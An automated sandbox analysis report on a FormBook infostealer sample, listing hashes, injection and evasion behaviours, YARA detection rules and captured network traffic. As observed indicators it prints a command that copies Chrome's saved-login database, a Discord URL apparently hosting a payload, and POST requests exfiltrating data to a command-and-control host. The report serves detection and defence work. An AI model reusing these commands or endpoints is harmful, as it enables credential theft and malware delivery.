
# Analysis Report Ijxlcmh_Signed_.exe

## Overview

### General Information

- Sample Name: Ijxlcmh_Signed_.exe
- Analysis ID: 299496
- MD5: d5dd88f0d5994ec98e07b2fb77e72bc9
- SHA1: 60d36f37a02d126601b7fde79be4db52a43a6be3
- SHA256: 6c69a036d1c25c0c3203e2cc14ad23fd386bb69f3344fe78113e1f3f07b98a4c
- Tags: exe

### Detection

FormBook

- Score: 100 (range: 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

- Detected FormBook malware
- Malicious sample detected (through community Yara rule)
- Multi AV Scanner detection for dropped file
- Multi AV Scanner detection for submitted file
- Sigma detected: Steal Google chrome login data
- Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
- System process connects to network (likely due to code injection or exploit)
- Yara detected FormBook
- Allocates memory in foreign processes
- Creates a thread in another existing process (thread injection)
- Creates an undocumented autostart registry key
- Injects a PE file into a foreign process
- Maps a DLL or memory area into another process
- Modifies the context of a thread in another process (thread injection)
- Modifies the prolog of user mode functions (user mode inline hooks)
- Queues an APC in another process (thread injection)
- Sample uses process hollowing technique
- Tries to detect virtualization through RDTSC time measurements
- Tries to harvest and steal browser information (history, passwords, etc)
- Tries to steal Mail credentials (via file access)
- Uses netstat to query active network connections and open ports
- Writes to foreign memory regions
- Antivirus or Machine Learning detection for unpacked file
- Checks if the current process is being debugged
- Contains functionality for execution timing, often used to detect debuggers
- Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
- Contains functionality to call native functions
- Contains functionality to read the PEB
- Creates a process in suspended mode (likely to inject code)
- Detected potential crypto function
- Drops PE files
- Enables debug privileges
- Found inlined nop instructions (likely shell or obfuscated code)
- Found potential string decryption / allocating functions
- HTTP GET or POST without a user agent
- IP address seen in connection with other malware
- Internet Provider seen in connection with other malware
- JA3 SSL client fingerprint seen in connection with other malware
- May sleep (evasive loops) to hinder dynamic analysis
- Monitors certain registry keys / values for changes (often done to protect autostart functionality)
- PE / OLE file has an invalid certificate
- PE file contains strange resources
- Sample execution stops while process was sleeping (likely an evasion)
- Sample file is different than original file name gathered from version info
- Tries to load missing DLLs
- Uses a known web browser user agent for HTTP communication
- Uses code obfuscation techniques (call, push, ret)
- Yara signature match

### Classification

System is w10x64

- Ijxlcmh_Signed_.exe (PID: 6252, cmdline: 'C:\Users\user\Desktop\Ijxlcmh_Signed_.exe', MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)
- ieinstal.exe (PID: 2168, cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe, MD5: DAD17AB737E680C47C8A44CBB95EE67E)
- explorer.exe (PID: 3388, cmdline: (empty), MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- Ijxldrv.exe (PID: 6976, cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe', MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)
- ieinstal.exe (PID: 2616, cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe, MD5: DAD17AB737E680C47C8A44CBB95EE67E)
- Ijxldrv.exe (PID: 4112, cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe', MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)
- ieinstal.exe (PID: 6232, cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe, MD5: DAD17AB737E680C47C8A44CBB95EE67E)
- autofmt.exe (PID: 6680, cmdline: C:\Windows\SysWOW64\autofmt.exe, MD5: 7FC345F685C2A58283872D851316ACC4)
- NETSTAT.EXE (PID: 6692, cmdline: C:\Windows\SysWOW64\NETSTAT.EXE, MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
- cmd.exe (PID: 6776, cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5860, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- msiexec.exe (PID: 6448, cmdline: C:\Windows\SysWOW64\msiexec.exe, MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
- msiexec.exe (PID: 1000, cmdline: C:\Windows\SysWOW64\msiexec.exe, MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
- cleanup

## Malware Configuration

No configs have been found

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\lxjI.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x9b:\$hotkey: \x0AHotKey=1; 0x0:\$url_explicit: [InternetShortcut] |
| C:\Users\user\AppData\Local\lxjI.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x14:\$file: URL=; 0x0:\$url_explicit: [InternetShortcut] |
| C:\Users\user\AppData\Local\lxjI.url | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x70:\$icon: IconFile=; 0x0:\$url_explicit: [InternetShortcut] |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x88e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x8b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x14675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x14161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x14777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x148ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0x956a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x133dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xa263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1a4e7:\$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1b4ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |
| 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | 0x17409:\$sqlite3step: 68 34 1C 7B E1; 0x1751c:\$sqlite3step: 68 34 1C 7B E1; 0x17438:\$sqlite3text: 68 38 2A 90 C5; 0x1755d:\$sqlite3text: 68 38 2A 90 C5; 0x1744b:\$sqlite3blob: 68 53 D8 7F 8C; 0x17573:\$sqlite3blob: 68 53 D8 7F 8C |
| 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1b4e7:\$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1c4ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 2.2.ieinstal.exe.10410000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 2.2.ieinstal.exe.10410000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1b4e7:\$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1c4ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |
| 2.2.ieinstal.exe.10410000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | 0x18409:\$sqlite3step: 68 34 1C 7B E1; 0x1851c:\$sqlite3step: 68 34 1C 7B E1; 0x18438:\$sqlite3text: 68 38 2A 90 C5; 0x1855d:\$sqlite3text: 68 38 2A 90 C5; 0x1844b:\$sqlite3blob: 68 53 D8 7F 8C; 0x18573:\$sqlite3blob: 68 53 D8 7F 8C |
| 18.2.ieinstal.exe.10410000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 18.2.ieinstal.exe.10410000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1b4e7:\$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1c4ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |

## Sigma Overview

### System Summary:

Sigma detected: Steal Google chrome login data

Source: Process started, Author: Joe Security. Data:

- Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
- CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
- CommandLine|base64offset|contains: (empty)
- Image: C:\Windows\SysWOW64\cmd.exe
- NewProcessName: C:\Windows\SysWOW64\cmd.exe
- OriginalFileName: C:\Windows\SysWOW64\cmd.exe
- ParentCommandLine: C:\Windows\SysWOW64\NETSTAT.EXE
- ParentImage: C:\Windows\SysWOW64\NETSTAT.EXE
- ParentProcessId: 6692
- ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
- ProcessId: 6776

## Signature Overview

### AV Detection:

Multi AV Scanner detection for dropped file

- Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe, ReversingLabs: Detection: 25%

Multi AV Scanner detection for submitted file

- Source: Ijxlcmh_Signed_.exe, Virustotal: Detection: 25%
- Source: Ijxlcmh_Signed_.exe, ReversingLabs: Detection: 25%
Yara detected FormBook

Source: Yara match. File sources:

- 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY
- 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY
- 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY
- 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY
- 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
- 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY
- 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
- 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY
- 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
- 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
- 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY
- 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY
- 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
- 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY
- 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY
- 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY
- 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY
- 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
- 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY
- 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
- 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY
- 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
- 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY
- 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
- 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
- 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
- 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
- 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
- 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
- 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
- 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE
- 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file

- Source: 7.2.Ijxldrv.exe.10410000.7.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 12.2.Ijxldrv.exe.10410000.7.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 18.2.ieinstal.exe.10410000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 2.2.ieinstal.exe.10410000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 15.2.ieinstal.exe.10410000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe, code functions with 4x nop then:

- mov eax, dword ptr [0040C7CCh] 0_3_02243B34
- or edx, 00000200h 0_3_02238308
- or edx, 00000200h 0_3_02243928
- or edx, 00000200h 0_3_02243935
- push 00000000h 0_3_02238690
- push 00000000h 0_3_02238698
- mov eax, dword ptr [0040C7CCh] 0_3_02238514
- push 00000000h 0_3_02243D9C
- push 00000000h 0_3_0222B340
- push 00000000h 0_3_0222B348
- mov eax, dword ptr [0040C7CCh] 0_3_0222B1C4
- or edx, 00000200h 0_3_0222AFB8

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe (PID 6976), code functions with 4x nop then:

- mov eax, dword ptr [0040C7CCh] 7_3_02223B34
- or edx, 00000200h 7_3_02218308
- or edx, 00000200h 7_3_02223928
- or edx, 00000200h 7_3_02223935
- push 00000000h 7_3_02218690
- push 00000000h 7_3_02218698
- mov eax, dword ptr [0040C7CCh] 7_3_02218514
- push 00000000h 7_3_02223D9C
- push 00000000h 7_3_0220B340
- push 00000000h 7_3_0220B348
- mov eax, dword ptr [0040C7CCh] 7_3_0220B1C4
- or edx, 00000200h 7_3_0220AFB8

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe (PID 4112), code functions with 4x nop then:

- mov eax, dword ptr [0040C7CCh] 12_3_02693B34
- or edx, 00000200h 12_3_02688308
- or edx, 00000200h 12_3_02693928
- or edx, 00000200h 12_3_02693935
- push 00000000h 12_3_02688698
- push 00000000h 12_3_02688690
- mov eax, dword ptr [0040C7CCh] 12_3_02688514
- push 00000000h 12_3_02693D9C
- push 00000000h 12_3_0267B340
- push 00000000h 12_3_0267B348
- mov eax, dword ptr [0040C7CCh] 12_3_0267B1C4
- or edx, 00000200h 12_3_0267AFB8

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

- Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49755

Uses netstat to query active network connections and open ports

- Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

HTTP GET or POST without a user agent

- Source: global traffic, HTTP traffic detected: GET /oav/?k0GdCl1=OGiTtEl8oZpE8Sv3fxvazbyjtykFcfSLP9Tv9n1IDimktFHXuVh+PBX3cY6ZEpQG1B1V&tZU4=NX1pk HTTP/1.1 Host: www.mybabyshop4you.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii: (empty)

IP address seen in connection with other malware

- Source: Joe Sandbox View, IP Address: 162.159.130.233
- Source: Joe Sandbox View, IP Address: 34.102.136.180

Internet Provider seen in connection with other malware

- Source: Joe Sandbox View, ASN Name: GOOGLEUS

JA3 SSL client fingerprint seen in connection with other malware

- Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication

- Source: global traffic, HTTP traffic detected: POST /oav/ HTTP/1.1 Host: www.mybabyshop4you.com Connection: close Content-Length: 717 Cache-Control: no-cache Origin: http://www.mybabyshop4you.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mybabyshop4you.com/oav/ Accept-Language: en-US Accept-Encoding: gzip, deflate
- Source: global traffic, HTTP traffic detected: POST /oav/ HTTP/1.1 Host: www.mybabyshop4you.com Connection: close Content-Length: 169817 Cache-Control: no-cache Origin: http://www.mybabyshop4you.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mybabyshop4you.com/oav/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Downloads files from webservers via HTTP

- Source: global traffic, HTTP traffic detected: GET /oav/?k0GdCl1=OGiTtEl8oZpE8Sv3fxvazbyjtykFcfSLP9Tv9n1IDimktFHXuVh+PBX3cY6ZEpQG1B1V&tZU4=NX1pk HTTP/1.1 Host: www.mybabyshop4you.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii: (empty)

Performs DNS lookups

- Source: unknown, DNS traffic detected: queries for: cdn.discordapp.com
Posts data to webserver

- Source: unknown, HTTP traffic detected: POST /oav/ HTTP/1.1 Host: www.mybabyshop4you.com Connection: close Content-Length: 717 Cache-Control: no-cache Origin: http://www.mybabyshop4you.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mybabyshop4you.com/oav/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Urls found in memory or binary data

Source: Ijxlcmh_Signed_.exe, strings found in binary or memory:

- http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
- http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
- http://crl.thawte.com/ThawteTimestampingCA.crl0
- http://ocsp.comodoca.com0
- http://ocsp.thawte.com0
- http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
- http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
- http://ts-ocsp.ws.symantec.com07

Source: explorer.exe, 00000004.00000000.324899208.0000000008907000.00000004.00000001.sdmp, strings found in binary or memory:

- http://crl.globalsign.net/root-r2.crl0

Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp, strings found in binary or memory:

- http://fontfabrik.com
- http://www.apache.org/licenses/LICENSE-2.0
- http://www.carterandcone.coml
- http://www.fontbureau.com
- http://www.fontbureau.com/designers
- http://www.fontbureau.com/designers/?
- http://www.fontbureau.com/designers/cabarga.htmlN
- http://www.fontbureau.com/designers/frere-jones.html
- http://www.fontbureau.com/designers8
- http://www.fontbureau.com/designers?
- http://www.fontbureau.com/designersG
- http://www.fonts.com
- http://www.founder.com.cn/cn
- http://www.founder.com.cn/cn/bThe
- http://www.founder.com.cn/cn/cThe
- http://www.galapagosdesign.com/DPlease
- http://www.galapagosdesign.com/staff/dennis.htm
- http://www.goodfont.co.kr
- http://www.jiyu-kobo.co.jp/

Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp, strings found in binary or memory:

- http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
- http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icog
- http://www.msn.com/?ocid=iehp
- http://www.msn.com/?ocid=iehpLMEM
- http://www.msn.com/de-ch/?ocid=iehp
- http://www.msn.com/de-ch/?ocid=iehpLMEMh
- http://www.msn.com/de-ch/?ocid=iehpZ3
- http://www.msn.com/de-ch/ocid=iehp
- http://www.msn.com/ocid=iehpK;

Source: NETSTAT.EXE, 00000011.00000002.496313834.0000000003439000.00000004.00000001.sdmp, strings found in binary or memory:

- http://www.mybabyshop4you.com
- http://www.mybabyshop4you.com/oav/

Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory:
http://www.sajatypeworks.com Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: Ijxldrv.exe, 00000007.00000002.322506056.00000000034A0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attac0 Source: Ijxldrv.exe, 00000007.00000002.322506056.00000000034A0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/720370823554138118/766538674925862932/Ijxlvnm Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/ Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png4_ Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Uses HTTPS

- Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
- Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
- Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
- Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
- Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
- Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747

### E-Banking Fraud:

Yara detected FormBook

- Source: Yara match File source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match File source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match File source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
- Source: Yara match File source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
- Source: Yara match File source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
- Source: Yara match File source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
- Source: Yara match File source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
- Source: Yara match File source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE
- Source: Yara match File source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

### System Summary:

Detected FormBook malware

- Source: C:\Windows\SysWOW64\NETSTAT.EXE Dropped file: C:\Users\user\AppData\Roaming\4201TS0U\420logri.ini
- Source: C:\Windows\SysWOW64\NETSTAT.EXE Dropped file: C:\Users\user\AppData\Roaming\4201TS0U\420logrv.ini

Malicious sample detected (through community Yara rule)

- Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
